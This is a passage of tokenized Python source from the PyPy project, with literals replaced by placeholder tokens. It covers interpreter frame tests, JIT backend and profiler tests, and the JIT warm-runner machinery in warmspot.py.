<s> from pypy . interpreter . eval import Frame <EOL> from pypy . interpreter . pycode import PyCode <EOL> class TestFrame : <EOL> def setup_method ( self , method ) : <EOL> def c ( x , y , * args ) : <EOL> pass <EOL> code = PyCode . _from_code ( self . space , c . func_code ) <EOL> class ConcreteFastscopeFrame ( Frame ) : <EOL> def __init__ ( self , space , code , numlocals ) : <EOL> self . code = code <EOL> Frame . __init__ ( self , space , numlocals = numlocals ) <EOL> self . fastlocals_w = [ None ] * self . numlocals <EOL> def getcode ( self ) : <EOL> return self . code <EOL> def setfastscope ( self , scope_w ) : <EOL> self . fastlocals_w = scope_w <EOL> def getfastscope ( self ) : <EOL> return self . fastlocals_w <EOL> self . f = ConcreteFastscopeFrame ( self . space , code , numlocals = <NUM_LIT:5> ) <EOL> def test_fast2locals ( self ) : <EOL> space = self . space <EOL> w = space . wrap <EOL> self . f . fast2locals ( ) <EOL> assert space . eq_w ( self . f . w_locals , self . space . wrap ( { } ) ) <EOL> self . f . fastlocals_w [ <NUM_LIT:0> ] = w ( <NUM_LIT:5> ) <EOL> self . f . fast2locals ( ) <EOL> assert space . eq_w ( self . f . w_locals , self . space . wrap ( { '<STR_LIT:x>' : <NUM_LIT:5> } ) ) <EOL> self . f . fastlocals_w [ <NUM_LIT:2> ] = w ( <NUM_LIT:7> ) <EOL> self . f . fast2locals ( ) <EOL> assert space . eq_w ( self . f . w_locals , self . space . wrap ( { '<STR_LIT:x>' : <NUM_LIT:5> , '<STR_LIT:args>' : <NUM_LIT:7> } ) ) <EOL> def sameList ( self , l1 , l2 ) : <EOL> assert len ( l1 ) == len ( l2 ) <EOL> for w_1 , w_2 in zip ( l1 , l2 ) : <EOL> assert ( w_1 is None ) == ( w_2 is None ) <EOL> if w_1 is not None : <EOL> assert self . space . eq_w ( w_1 , w_2 ) <EOL> def test_locals2fast ( self ) : <EOL> w = self . space . wrap <EOL> self . f . w_locals = self . space . wrap ( { } ) <EOL> self . f . locals2fast ( ) <EOL> self . sameList ( self . f . fastlocals_w , [ None ] * <NUM_LIT:5> ) <EOL> self . f . w_locals = self . space . wrap ( { '<STR_LIT:x>' : <NUM_LIT:5> } ) <EOL> self . f . locals2fast ( ) <EOL> self . sameList ( self . f . fastlocals_w , [ w ( <NUM_LIT:5> ) ] + [ None ] * <NUM_LIT:4> ) <EOL> self . f . w_locals = self . space . wrap ( { '<STR_LIT:x>' : <NUM_LIT:5> , '<STR_LIT:args>' : <NUM_LIT:7> } ) <EOL> self . f . locals2fast ( ) <EOL> self . sameList ( self . f . fastlocals_w , [ w ( <NUM_LIT:5> ) , None , w ( <NUM_LIT:7> ) , <EOL> None , None ] ) </s>
<s> import py <EOL> from pypy . jit . backend . cli . test . test_zrpy_basic import CliTranslatedJitMixin <EOL> from pypy . jit . metainterp . test import test_loop <EOL> class TestLoop ( CliTranslatedJitMixin , test_loop . TestOOtype ) : <EOL> def skip ( self ) : <EOL> py . test . skip ( '<STR_LIT>' ) <EOL> def test_interp_many_paths ( self ) : <EOL> pass <EOL> def test_interp_many_paths_2 ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import weakref <EOL> import py <EOL> from pypy . rlib import rgc <EOL> from pypy . rlib . jit import JitDriver <EOL> from pypy . jit . backend . llvm . runner import LLVMCPU <EOL> class X ( object ) : <EOL> next = None <EOL> def get_test ( main ) : <EOL> main . _dont_inline_ = True <EOL> def g ( n ) : <EOL> x = X ( ) <EOL> x . foo = <NUM_LIT:2> <EOL> main ( n , x ) <EOL> x . foo = <NUM_LIT:5> <EOL> return weakref . ref ( x ) <EOL> g . _dont_inline_ = True <EOL> def entrypoint ( args ) : <EOL> r_list = [ ] <EOL> for i in range ( <NUM_LIT:20> ) : <EOL> r = g ( <NUM_LIT> ) <EOL> r_list . append ( r ) <EOL> rgc . collect ( ) <EOL> rgc . collect ( ) ; rgc . collect ( ) <EOL> freed = <NUM_LIT:0> <EOL> for r in r_list : <EOL> if r ( ) is None : <EOL> freed += <NUM_LIT:1> <EOL> print freed <EOL> return <NUM_LIT:0> <EOL> return entrypoint <EOL> def compile_and_run ( f , gc , ** kwds ) : <EOL> from pypy . annotation . listdef import s_list_of_strings <EOL> from pypy . translator . translator import TranslationContext <EOL> from pypy . jit . metainterp . warmspot import apply_jit <EOL> from pypy . translator . c import genc <EOL> t = TranslationContext ( ) <EOL> t . config . translation . gc = gc <EOL> t . config . translation . gcconfig . debugprint = True <EOL> for name , value in kwds . items ( ) : <EOL> setattr ( t . config . translation , name , value ) <EOL> t . buildannotator ( ) . build_types ( f , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> if kwds [ '<STR_LIT>' ] : <EOL> apply_jit ( t , CPUClass = LLVMCPU ) <EOL> cbuilder = genc . CStandaloneBuilder ( t , f , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> data = cbuilder . cmdexec ( '<STR_LIT>' ) <EOL> return data . splitlines ( ) [ - <NUM_LIT:1> ] . strip ( ) <EOL> def test_compile_boehm ( ) : <EOL> myjitdriver = JitDriver ( greens = [ ] , reds = [ '<STR_LIT:n>' , '<STR_LIT:x>' ] ) <EOL> def main ( n , x ) : <EOL> while n > <NUM_LIT:0> : <EOL> myjitdriver . can_enter_jit ( n = n , x = x ) <EOL> myjitdriver . jit_merge_point ( n = n , x = x ) <EOL> y = X ( ) <EOL> y . foo = x . foo <EOL> n -= y . foo <EOL> res = compile_and_run ( get_test ( main ) , "<STR_LIT>" , jit = True ) <EOL> assert int ( res ) >= <NUM_LIT:16> </s>
<s> from pypy . jit . metainterp . test . test_recursive import RecursiveTests <EOL> from pypy . jit . backend . x86 . test . test_basic import Jit386Mixin <EOL> class TestRecursive ( Jit386Mixin , RecursiveTests ) : <EOL> pass </s>
<s> from pypy . rpython . lltypesystem import lltype , rclass <EOL> def get_vtable_for_gcstruct ( cpu , GCSTRUCT ) : <EOL> assert isinstance ( GCSTRUCT , lltype . GcStruct ) <EOL> HEAD = GCSTRUCT <EOL> while not HEAD . _hints . get ( '<STR_LIT>' ) : <EOL> _ , HEAD = HEAD . _first_struct ( ) <EOL> if HEAD is None : <EOL> return None <EOL> setup_cache_gcstruct2vtable ( cpu ) <EOL> return cpu . _cache_gcstruct2vtable [ GCSTRUCT ] <EOL> def setup_cache_gcstruct2vtable ( cpu ) : <EOL> if not hasattr ( cpu , '<STR_LIT>' ) : <EOL> cache = { } <EOL> cache . update ( testing_gcstruct2vtable ) <EOL> for rinstance in cpu . rtyper . instance_reprs . values ( ) : <EOL> cache [ rinstance . lowleveltype . TO ] = rinstance . rclass . getvtable ( ) <EOL> cpu . _cache_gcstruct2vtable = cache <EOL> def set_testing_vtable_for_gcstruct ( GCSTRUCT , vtable , name ) : <EOL> namez = name + '<STR_LIT:\x00>' <EOL> vtable . name = lltype . malloc ( rclass . OBJECT_VTABLE . name . TO , len ( namez ) , <EOL> immortal = True ) <EOL> for i in range ( len ( namez ) ) : <EOL> vtable . name [ i ] = namez [ i ] <EOL> testing_gcstruct2vtable [ GCSTRUCT ] = vtable <EOL> testing_gcstruct2vtable = { } </s>
<s> from pypy . jit . metainterp . warmspot import ll_meta_interp <EOL> from pypy . rlib . jit import JitDriver , dont_look_inside , purefunction <EOL> from pypy . jit . metainterp . test . test_basic import LLJitMixin <EOL> from pypy . jit . metainterp import pyjitpl <EOL> from pypy . jit . metainterp . jitprof import * <EOL> class FakeProfiler ( Profiler ) : <EOL> def __init__ ( self ) : <EOL> self . counter = <NUM_LIT> <EOL> self . events = [ ] <EOL> def timer ( self ) : <EOL> self . counter += <NUM_LIT:1> <EOL> return self . counter - <NUM_LIT:1> <EOL> def _start ( self , event ) : <EOL> Profiler . _start ( self , event ) <EOL> self . events . append ( event ) <EOL> def _end ( self , event ) : <EOL> Profiler . _end ( self , event ) <EOL> self . events . append ( ~ event ) <EOL> class ProfilerMixin ( LLJitMixin ) : <EOL> def meta_interp ( self , * args , ** kwds ) : <EOL> kwds = kwds . copy ( ) <EOL> kwds [ '<STR_LIT>' ] = FakeProfiler <EOL> return LLJitMixin . meta_interp ( self , * args , ** kwds ) <EOL> class TestProfile ( ProfilerMixin ) : <EOL> def test_simple_loop ( self ) : <EOL> myjitdriver = JitDriver ( greens = [ ] , reds = [ '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT>' ] ) <EOL> def f ( x , y ) : <EOL> res = <NUM_LIT:0> <EOL> while y > <NUM_LIT:0> : <EOL> myjitdriver . can_enter_jit ( x = x , y = y , res = res ) <EOL> myjitdriver . jit_merge_point ( x = x , y = y , res = res ) <EOL> res += x <EOL> y -= <NUM_LIT:1> <EOL> return res * <NUM_LIT:2> <EOL> res = self . meta_interp ( f , [ <NUM_LIT:6> , <NUM_LIT:7> ] ) <EOL> assert res == <NUM_LIT> <EOL> profiler = pyjitpl . _warmrunnerdesc . metainterp_sd . profiler <EOL> expected = [ <EOL> TRACING , <EOL> BACKEND , <EOL> ~ BACKEND , <EOL> ~ TRACING , <EOL> RUNNING , <EOL> ~ RUNNING , <EOL> BLACKHOLE , <EOL> ~ BLACKHOLE <EOL> ] <EOL> assert profiler . events == expected <EOL> assert profiler . times == [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> assert profiler . counters == [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> def test_simple_loop_with_call ( self ) : <EOL> @ dont_look_inside <EOL> def g ( n ) : <EOL> pass <EOL> myjitdriver = JitDriver ( greens = [ ] , reds = [ '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT>' ] ) <EOL> def f ( x , y ) : <EOL> res = <NUM_LIT:0> <EOL> while y > <NUM_LIT:0> : <EOL> myjitdriver . can_enter_jit ( x = x , y = y , res = res ) <EOL> myjitdriver . jit_merge_point ( x = x , y = y , res = res ) <EOL> res += x <EOL> g ( x ) <EOL> y -= <NUM_LIT:1> <EOL> return res * <NUM_LIT:2> <EOL> res = self . meta_interp ( f , [ <NUM_LIT:6> , <NUM_LIT:7> ] ) <EOL> assert res == <NUM_LIT> <EOL> profiler = pyjitpl . _warmrunnerdesc . metainterp_sd . profiler <EOL> assert profiler . calls == [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] ] <EOL> def test_blackhole_pure ( self ) : <EOL> @ purefunction <EOL> def g ( n ) : <EOL> return n + <NUM_LIT:1> <EOL> myjitdriver = JitDriver ( greens = [ '<STR_LIT:z>' ] , reds = [ '<STR_LIT:y>' , '<STR_LIT:x>' , '<STR_LIT>' ] ) <EOL> def f ( x , y , z ) : <EOL> res = <NUM_LIT:0> <EOL> while y > <NUM_LIT:0> : <EOL> myjitdriver . can_enter_jit ( x = x , y = y , res = res , z = z ) <EOL> myjitdriver . jit_merge_point ( x = x , y = y , res = res , z = z ) <EOL> res += x <EOL> if y == <NUM_LIT:1> : <EOL> res += g ( z ) <EOL> y -= <NUM_LIT:1> <EOL> return res * <NUM_LIT:2> <EOL> res = self . meta_interp ( f , [ <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:2> ] ) <EOL> assert res == <NUM_LIT> <EOL> profiler = pyjitpl . _warmrunnerdesc . metainterp_sd . profiler <EOL> assert profiler . calls == [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] </s>
<s> import sys <EOL> from pypy . rpython . lltypesystem import lltype , llmemory , rclass , rstr <EOL> from pypy . rpython . ootypesystem import ootype <EOL> from pypy . rpython . annlowlevel import llhelper , MixLevelHelperAnnotator , cast_base_ptr_to_instance , hlstr <EOL> from pypy . annotation import model as annmodel <EOL> from pypy . rpython . llinterp import LLException <EOL> from pypy . rpython . test . test_llinterp import get_interpreter , clear_tcache <EOL> from pypy . objspace . flow . model import SpaceOperation , Variable , Constant <EOL> from pypy . objspace . flow . model import checkgraph , Link , copygraph <EOL> from pypy . rlib . objectmodel import we_are_translated <EOL> from pypy . rlib . unroll import unrolling_iterable <EOL> from pypy . rlib . rarithmetic import r_uint , intmask <EOL> from pypy . rlib . debug import debug_print <EOL> from pypy . rpython . lltypesystem . lloperation import llop <EOL> from pypy . translator . simplify import get_funcobj , get_functype <EOL> from pypy . translator . unsimplify import call_final_function <EOL> from pypy . jit . metainterp import codewriter <EOL> from pypy . jit . metainterp import support , history , pyjitpl , gc <EOL> from pypy . jit . metainterp . pyjitpl import MetaInterpStaticData , MetaInterp <EOL> from pypy . jit . metainterp . policy import JitPolicy <EOL> from pypy . jit . metainterp . typesystem import LLTypeHelper , OOTypeHelper <EOL> from pypy . jit . metainterp . jitprof import Profiler , EmptyProfiler <EOL> from pypy . rlib . jit import DEBUG_STEPS , DEBUG_DETAILED , DEBUG_OFF , DEBUG_PROFILE <EOL> def apply_jit ( translator , backend_name = "<STR_LIT>" , debug_level = DEBUG_STEPS , <EOL> inline = False , <EOL> ** kwds ) : <EOL> if '<STR_LIT>' not in kwds : <EOL> from pypy . jit . backend . detect_cpu import getcpuclass <EOL> kwds [ '<STR_LIT>' ] = getcpuclass ( backend_name ) <EOL> if debug_level > DEBUG_OFF : <EOL> ProfilerClass = Profiler <EOL> else : <EOL> ProfilerClass = EmptyProfiler <EOL> warmrunnerdesc = WarmRunnerDesc ( translator , <EOL> translate_support_code = True , <EOL> listops = True , <EOL> no_stats = True , <EOL> ProfilerClass = ProfilerClass , <EOL> ** kwds ) <EOL> warmrunnerdesc . state . set_param_inlining ( inline ) <EOL> warmrunnerdesc . state . set_param_debug ( debug_level ) <EOL> warmrunnerdesc . finish ( ) <EOL> translator . warmrunnerdesc = warmrunnerdesc <EOL> def ll_meta_interp ( function , args , backendopt = False , type_system = '<STR_LIT>' , <EOL> listcomp = False , ** kwds ) : <EOL> if listcomp : <EOL> extraconfigopts = { '<STR_LIT>' : True } <EOL> else : <EOL> extraconfigopts = { } <EOL> interp , graph = get_interpreter ( function , args , <EOL> backendopt = False , <EOL> type_system = type_system , <EOL> ** extraconfigopts ) <EOL> clear_tcache ( ) <EOL> return jittify_and_run ( interp , graph , args , backendopt = backendopt , ** kwds ) <EOL> def jittify_and_run ( interp , graph , args , repeat = <NUM_LIT:1> , <EOL> backendopt = False , trace_limit = sys . maxint , <EOL> debug_level = DEBUG_STEPS , inline = False , ** kwds ) : <EOL> translator = interp . typer . annotator . translator <EOL> translator . config . translation . gc = "<STR_LIT>" <EOL> warmrunnerdesc = WarmRunnerDesc ( translator , backendopt = backendopt , ** kwds ) <EOL> warmrunnerdesc . state . set_param_threshold ( <NUM_LIT:3> ) <EOL> warmrunnerdesc . state . set_param_trace_eagerness ( <NUM_LIT:2> ) <EOL> warmrunnerdesc . state . set_param_trace_limit ( trace_limit ) <EOL> warmrunnerdesc . state . set_param_inlining ( inline ) <EOL> warmrunnerdesc . state . set_param_debug ( debug_level ) <EOL> warmrunnerdesc . finish ( ) <EOL> res = interp . eval_graph ( graph , args ) <EOL> if not kwds . get ( '<STR_LIT>' , False ) : <EOL> warmrunnerdesc . metainterp_sd . profiler . finish ( ) <EOL> print '<STR_LIT>' , res <EOL> while repeat > <NUM_LIT:1> : <EOL> print '<STR_LIT>' * <NUM_LIT> <EOL> res1 = interp . eval_graph ( graph , args ) <EOL> if isinstance ( res , int ) : <EOL> assert res1 == res <EOL> repeat -= <NUM_LIT:1> <EOL> return res <EOL> def rpython_ll_meta_interp ( function , args , backendopt = True , <EOL> loops = '<STR_LIT>' , ** kwds ) : <EOL> return ll_meta_interp ( function , args , backendopt = backendopt , <EOL> translate_support_code = True , ** kwds ) <EOL> def _find_jit_marker ( graphs , marker_name ) : <EOL> results = [ ] <EOL> for graph in graphs : <EOL> for block in graph . iterblocks ( ) : <EOL> for i in range ( len ( block . operations ) ) : <EOL> op = block . operations [ i ] <EOL> if ( op . opname == '<STR_LIT>' and <EOL> op . args [ <NUM_LIT:0> ] . value == marker_name ) : <EOL> results . append ( ( graph , block , i ) ) <EOL> return results <EOL> def find_can_enter_jit ( graphs ) : <EOL> results = _find_jit_marker ( graphs , '<STR_LIT>' ) <EOL> if not results : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> return results <EOL> def find_jit_merge_point ( graphs ) : <EOL> results = _find_jit_marker ( graphs , '<STR_LIT>' ) <EOL> if len ( results ) != <NUM_LIT:1> : <EOL> raise Exception ( "<STR_LIT>" % <EOL> ( len ( results ) , ) ) <EOL> return results [ <NUM_LIT:0> ] <EOL> def find_set_param ( graphs ) : <EOL> return _find_jit_marker ( graphs , '<STR_LIT>' ) <EOL> def get_stats ( ) : <EOL> return pyjitpl . _warmrunnerdesc . stats <EOL> def get_translator ( ) : <EOL> return pyjitpl . _warmrunnerdesc . translator <EOL> def debug_checks ( ) : <EOL> stats = get_stats ( ) <EOL> stats . maybe_view ( ) <EOL> stats . check_consistency ( ) <EOL> class JitException ( Exception ) : <EOL> _go_through_llinterp_uncaught_ = True <EOL> class ContinueRunningNormallyBase ( JitException ) : <EOL> pass <EOL> class CannotInlineCanEnterJit ( JitException ) : <EOL> pass <EOL> class WarmRunnerDesc : <EOL> def __init__ ( self , translator , policy = None , backendopt = True , CPUClass = None , <EOL> optimizer = None , ** kwds ) : <EOL> pyjitpl . _warmrunnerdesc = self <EOL> if policy is None : <EOL> policy = JitPolicy ( ) <EOL> self . set_translator ( translator ) <EOL> self . find_portal ( ) <EOL> self . make_leave_jit_graph ( ) <EOL> self . codewriter = codewriter . CodeWriter ( self . rtyper ) <EOL> graphs = self . codewriter . find_all_graphs ( self . portal_graph , <EOL> self . leave_graph , <EOL> policy , <EOL> CPUClass . supports_floats ) <EOL> policy . dump_unsafe_loops ( ) <EOL> self . check_access_directly_sanity ( graphs ) <EOL> if backendopt : <EOL> self . prejit_optimizations ( policy , graphs ) <EOL> self . build_meta_interp ( CPUClass , ** kwds ) <EOL> self . make_args_specification ( ) <EOL> self . rewrite_jit_merge_point ( policy ) <EOL> self . make_driverhook_graphs ( ) <EOL> if self . jitdriver . virtualizables : <EOL> from pypy . jit . metainterp . virtualizable import VirtualizableInfo <EOL> self . metainterp_sd . virtualizable_info = VirtualizableInfo ( self ) <EOL> self . codewriter . generate_bytecode ( self . metainterp_sd , <EOL> self . portal_graph , <EOL> self . leave_graph , <EOL> self . portal_runner_ptr <EOL> ) <EOL> self . make_enter_function ( ) <EOL> self . rewrite_can_enter_jit ( ) <EOL> self . rewrite_set_param ( ) <EOL> self . add_profiler_finish ( ) <EOL> self . metainterp_sd . finish_setup ( optimizer = optimizer ) <EOL> def finish ( self ) : <EOL> vinfo = self . metainterp_sd . virtualizable_info <EOL> if vinfo is not None : <EOL> vinfo . finish ( ) <EOL> if self . cpu . translate_support_code : <EOL> self . annhelper . finish ( ) <EOL> def _freeze_ ( self ) : <EOL> return True <EOL> def set_translator ( self , translator ) : <EOL> self . translator = translator <EOL> self . rtyper = translator . rtyper <EOL> self . gcdescr = gc . get_description ( translator . config ) <EOL> def find_portal ( self ) : <EOL> graphs = self . translator . graphs <EOL> self . jit_merge_point_pos = find_jit_merge_point ( graphs ) <EOL> graph , block , pos = self . jit_merge_point_pos <EOL> op = block . operations [ pos ] <EOL> args = op . args [ <NUM_LIT:2> : ] <EOL> s_binding = self . translator . annotator . binding <EOL> self . portal_args_s = [ s_binding ( v ) for v in args ] <EOL> graph = copygraph ( graph ) <EOL> graph . startblock . isstartblock = False <EOL> graph . startblock = support . split_before_jit_merge_point ( <EOL> * find_jit_merge_point ( [ graph ] ) ) <EOL> graph . startblock . isstartblock = True <EOL> checkgraph ( graph ) <EOL> for v in graph . getargs ( ) : <EOL> assert isinstance ( v , Variable ) <EOL> assert len ( dict . fromkeys ( graph . getargs ( ) ) ) == len ( graph . getargs ( ) ) <EOL> self . translator . graphs . append ( graph ) <EOL> self . portal_graph = graph <EOL> assert hasattr ( graph , "<STR_LIT>" ) <EOL> graph . func . _dont_inline_ = True <EOL> graph . func . _jit_unroll_safe_ = True <EOL> self . jitdriver = block . operations [ pos ] . args [ <NUM_LIT:1> ] . value <EOL> def check_access_directly_sanity ( self , graphs ) : <EOL> from pypy . translator . backendopt . inline import collect_called_graphs <EOL> jit_graphs = set ( graphs ) <EOL> for graph in collect_called_graphs ( self . translator . graphs [ <NUM_LIT:0> ] , <EOL> self . translator ) : <EOL> if graph in jit_graphs : <EOL> continue <EOL> assert not getattr ( graph , '<STR_LIT>' , False ) <EOL> def prejit_optimizations ( self , policy , graphs ) : <EOL> from pypy . translator . backendopt . all import backend_optimizations <EOL> backend_optimizations ( self . translator , <EOL> graphs = graphs , <EOL> merge_if_blocks = True , <EOL> constfold = True , <EOL> raisingop2direct_call = False , <EOL> remove_asserts = True , <EOL> really_remove_asserts = True ) <EOL> def build_meta_interp ( self , CPUClass , translate_support_code = False , <EOL> view = "<STR_LIT>" , no_stats = False , <EOL> ProfilerClass = EmptyProfiler , ** kwds ) : <EOL> assert CPUClass is not None <EOL> opt = history . Options ( ** kwds ) <EOL> if no_stats : <EOL> stats = history . NoStats ( ) <EOL> else : <EOL> stats = history . Stats ( ) <EOL> self . stats = stats <EOL> if translate_support_code : <EOL> self . annhelper = MixLevelHelperAnnotator ( self . translator . rtyper ) <EOL> annhelper = self . annhelper <EOL> else : <EOL> annhelper = None <EOL> cpu = CPUClass ( self . translator . rtyper , self . stats , <EOL> translate_support_code , gcdescr = self . gcdescr ) <EOL> self . cpu = cpu <EOL> self . metainterp_sd = MetaInterpStaticData ( self . portal_graph , <EOL> cpu , <EOL> self . stats , opt , <EOL> ProfilerClass = ProfilerClass , <EOL> warmrunnerdesc = self ) <EOL> def make_enter_function ( self ) : <EOL> from pypy . jit . metainterp . warmstate import WarmEnterState <EOL> state = WarmEnterState ( self ) <EOL> maybe_compile_and_run = state . make_entry_point ( ) <EOL> self . state = state <EOL> def crash_in_jit ( e ) : <EOL> if not we_are_translated ( ) : <EOL> print "<STR_LIT>" <EOL> print '<STR_LIT>' % ( e . __class__ , e ) <EOL> if sys . stdout == sys . __stdout__ : <EOL> import pdb ; pdb . post_mortem ( sys . exc_info ( ) [ <NUM_LIT:2> ] ) <EOL> raise <EOL> debug_print ( '<STR_LIT>' ) <EOL> debug_print ( '<STR_LIT>' % ( e , ) ) <EOL> raise history . CrashInJIT ( "<STR_LIT>" ) <EOL> crash_in_jit . _dont_inline_ = True <EOL> if self . translator . rtyper . type_system . name == '<STR_LIT>' : <EOL> def maybe_enter_jit ( * args ) : <EOL> try : <EOL> maybe_compile_and_run ( * args ) <EOL> except JitException : <EOL> raise <EOL> except Exception , e : <EOL> crash_in_jit ( e ) <EOL> maybe_enter_jit . _always_inline_ = True <EOL> else : <EOL> def maybe_enter_jit ( * args ) : <EOL> maybe_compile_and_run ( * args ) <EOL> maybe_enter_jit . _always_inline_ = True <EOL> self . maybe_enter_jit_fn = maybe_enter_jit <EOL> def make_leave_jit_graph ( self ) : <EOL> self . leave_graph = None <EOL> if self . jitdriver . leave : <EOL> args_s = self . portal_args_s <EOL> from pypy . annotation import model as annmodel <EOL> annhelper = MixLevelHelperAnnotator ( self . translator . rtyper ) <EOL> s_result = annmodel . s_None <EOL> self . leave_graph = annhelper . getgraph ( self . jitdriver . leave , <EOL> args_s , s_result ) <EOL> annhelper . finish ( ) <EOL> def make_driverhook_graphs ( self ) : <EOL> from pypy . rlib . jit import BaseJitCell <EOL> bk = self . rtyper . annotator . bookkeeper <EOL> classdef = bk . getuniqueclassdef ( BaseJitCell ) <EOL> s_BaseJitCell_or_None = annmodel . SomeInstance ( classdef , <EOL> can_be_None = True ) <EOL> s_BaseJitCell_not_None = annmodel . SomeInstance ( classdef ) <EOL> s_Str = annmodel . SomeString ( ) <EOL> annhelper = MixLevelHelperAnnotator ( self . translator . rtyper ) <EOL> self . set_jitcell_at_ptr = self . _make_hook_graph ( <EOL> annhelper , self . jitdriver . set_jitcell_at , annmodel . s_None , <EOL> s_BaseJitCell_not_None ) <EOL> self . get_jitcell_at_ptr = self . _make_hook_graph ( <EOL> annhelper , self . jitdriver . get_jitcell_at , s_BaseJitCell_or_None ) <EOL> self . can_inline_ptr = self . _make_hook_graph ( <EOL> annhelper , self . jitdriver . can_inline , annmodel . s_Bool ) <EOL> self . get_printable_location_ptr = self . _make_hook_graph ( <EOL> annhelper , self . jitdriver . get_printable_location , s_Str ) <EOL> annhelper . finish ( ) <EOL> def _make_hook_graph ( self , annhelper , func , s_result , s_first_arg = None ) : <EOL> if func is None : <EOL> return None <EOL> extra_args_s = [ ] <EOL> if s_first_arg is not None : <EOL> extra_args_s . append ( s_first_arg ) <EOL> args_s = self . portal_args_s [ : len ( self . green_args_spec ) ] <EOL> graph = annhelper . getgraph ( func , extra_args_s + args_s , s_result ) <EOL> funcptr = annhelper . graph2delayed ( graph ) <EOL> return funcptr <EOL> def make_args_specification ( self ) : <EOL> graph , block , index = self . jit_merge_point_pos <EOL> op = block . operations [ index ] <EOL> args = op . args [ <NUM_LIT:2> : ] <EOL> ALLARGS = [ ] <EOL> self . green_args_spec = [ ] <EOL> self . red_args_types = [ ] <EOL> for i , v in enumerate ( args ) : <EOL> TYPE = v . concretetype <EOL> ALLARGS . append ( TYPE ) <EOL> if i < len ( self . jitdriver . greens ) : <EOL> self . green_args_spec . append ( TYPE ) <EOL> else : <EOL> self . red_args_types . append ( history . getkind ( TYPE ) ) <EOL> self . num_green_args = len ( self . green_args_spec ) <EOL> RESTYPE = graph . getreturnvar ( ) . concretetype <EOL> ( self . JIT_ENTER_FUNCTYPE , <EOL> self . PTR_JIT_ENTER_FUNCTYPE ) = self . cpu . ts . get_FuncType ( ALLARGS , lltype . Void ) <EOL> ( self . PORTAL_FUNCTYPE , <EOL> self . PTR_PORTAL_FUNCTYPE ) = self . cpu . ts . get_FuncType ( ALLARGS , RESTYPE ) <EOL> def rewrite_can_enter_jit ( self ) : <EOL> FUNC = self . JIT_ENTER_FUNCTYPE <EOL> FUNCPTR = self . PTR_JIT_ENTER_FUNCTYPE <EOL> jit_enter_fnptr = self . helper_func ( FUNCPTR , self . maybe_enter_jit_fn ) <EOL> graphs = self . translator . graphs <EOL> can_enter_jits = find_can_enter_jit ( graphs ) <EOL> for graph , block , index in can_enter_jits : <EOL> if graph is self . jit_merge_point_pos [ <NUM_LIT:0> ] : <EOL> continue <EOL> op = block . operations [ index ] <EOL> greens_v , reds_v = decode_hp_hint_args ( op ) <EOL> args_v = greens_v + reds_v <EOL> vlist = [ Constant ( jit_enter_fnptr , FUNCPTR ) ] + args_v <EOL> v_result = Variable ( ) <EOL> v_result . concretetype = lltype . Void <EOL> newop = SpaceOperation ( '<STR_LIT>' , vlist , v_result ) <EOL> block . operations [ index ] = newop <EOL> def helper_func ( self , FUNCPTR , func ) : <EOL> if not self . cpu . translate_support_code : <EOL> return llhelper ( FUNCPTR , func ) <EOL> FUNC = get_functype ( FUNCPTR ) <EOL> args_s = [ annmodel . lltype_to_annotation ( ARG ) for ARG in FUNC . ARGS ] <EOL> s_result = annmodel . lltype_to_annotation ( FUNC . RESULT ) <EOL> graph = self . annhelper . getgraph ( func , args_s , s_result ) <EOL> return self . annhelper . graph2delayed ( graph , FUNC ) <EOL> def rewrite_jit_merge_point ( self , policy ) : <EOL> origportalgraph = self . jit_merge_point_pos [ <NUM_LIT:0> ] <EOL> portalgraph = self . portal_graph <EOL> PORTALFUNC = self . PORTAL_FUNCTYPE <EOL> portal_ptr = self . cpu . ts . functionptr ( PORTALFUNC , '<STR_LIT>' , <EOL> graph = portalgraph ) <EOL> self . portal_ptr = portal_ptr <EOL> portalfunc_ARGS = unrolling_iterable ( <EOL> [ ( i , '<STR_LIT>' % i , ARG ) for i , ARG in enumerate ( PORTALFUNC . ARGS ) ] ) <EOL> class DoneWithThisFrameVoid ( JitException ) : <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' <EOL> class DoneWithThisFrameInt ( JitException ) : <EOL> def __init__ ( self , result ) : <EOL> assert lltype . typeOf ( result ) is lltype . Signed <EOL> self . result = result <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . result , ) <EOL> class DoneWithThisFrameRef ( JitException ) : <EOL> def __init__ ( self , cpu , result ) : <EOL> assert lltype . typeOf ( result ) == cpu . ts . BASETYPE <EOL> self . result = result <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . result , ) <EOL> class DoneWithThisFrameFloat ( JitException ) : <EOL> def __init__ ( self , result ) : <EOL> assert lltype . typeOf ( result ) is lltype . Float <EOL> self . result = result <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . result , ) <EOL> class ExitFrameWithExceptionRef ( JitException ) : <EOL> def __init__ ( self , cpu , value ) : <EOL> assert lltype . typeOf ( value ) == cpu . ts . BASETYPE <EOL> self . value = value <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . value , ) <EOL> class ContinueRunningNormally ( ContinueRunningNormallyBase ) : <EOL> def __init__ ( self , argboxes ) : <EOL> from pypy . jit . metainterp . warmstate import unwrap <EOL> for i , name , ARG in portalfunc_ARGS : <EOL> v = unwrap ( ARG , argboxes [ i ] ) <EOL> setattr ( self , name , v ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( map ( str , self . args ) ) , ) <EOL> self 